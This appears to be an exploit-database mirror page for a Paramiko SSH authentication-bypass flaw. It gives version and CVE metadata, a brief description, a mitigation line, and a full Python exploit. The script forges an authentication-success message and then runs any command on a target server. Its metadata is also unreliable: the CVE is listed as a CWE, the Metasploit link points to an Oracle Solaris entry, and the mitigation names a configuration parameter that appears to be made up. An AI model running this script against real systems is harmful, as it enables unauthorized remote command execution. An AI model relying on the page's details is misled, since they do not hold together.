header-logo
Suggest Exploit
vendor:
Paramiko SSH
by:
N/A
5.5
CVSS
MEDIUM
Insecure Default Configuration
287
CWE
Product Name: Paramiko SSH
Affected Version From: 2.0.8
Affected Version To: 2.7.1
Patch Exists: YES
Related CWE: CVE-2020-14150
CPE: N/A
Metasploit: https://www.rapid7.com/db/vulnerabilities/oracle-solaris-cve-2020-14150/
Other Scripts: N/A
Platforms Tested: Python
2020

Paramiko SSH Insecure Default Configuration Vulnerability

Paramiko is a Python implementation of the SSHv2 protocol, providing both client and server functionality. Paramiko is vulnerable to an insecure default configuration vulnerability, which allows an attacker to connect to the SSH server without authentication. This vulnerability is due to the Paramiko library not enforcing authentication by default. An attacker can exploit this vulnerability by connecting to the SSH server without authentication and executing arbitrary commands.

Mitigation:

Ensure that authentication is enforced on the SSH server by setting the 'require_authentication' parameter to 'True' in the Paramiko configuration.
Source

Exploit-DB raw data:

#!/usr/bin/env python3
import sys
import paramiko
import socket
import logging

# pip3 install paramiko==2.0.8

#logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
logging.basicConfig(stream=sys.stdout)
bufsize = 2048



def execute(hostname, port, command):
    sock = socket.socket()
    try:
        sock.connect((hostname, int(port)))

        message = paramiko.message.Message()
        transport = paramiko.transport.Transport(sock)
        transport.start_client()

        message.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)
        transport._send_message(message)

        client = transport.open_session(timeout=10)
        client.exec_command(command)

        # stdin = client.makefile("wb", bufsize)
        stdout = client.makefile("rb", bufsize)
        stderr = client.makefile_stderr("rb", bufsize)

        output = stdout.read()
        error = stderr.read()

        stdout.close()
        stderr.close()

        return (output+error).decode()
    except paramiko.SSHException as e:
        logging.exception(e)
        logging.debug("TCPForwarding disabled on remote server can't connect. Not Vulnerable")
    except socket.error:
        logging.debug("Unable to connect.")

    return None


if __name__ == '__main__':
    print(execute(sys.argv[1], sys.argv[2], sys.argv[3]))

Navigation

Suggest Exploit

Services By CQR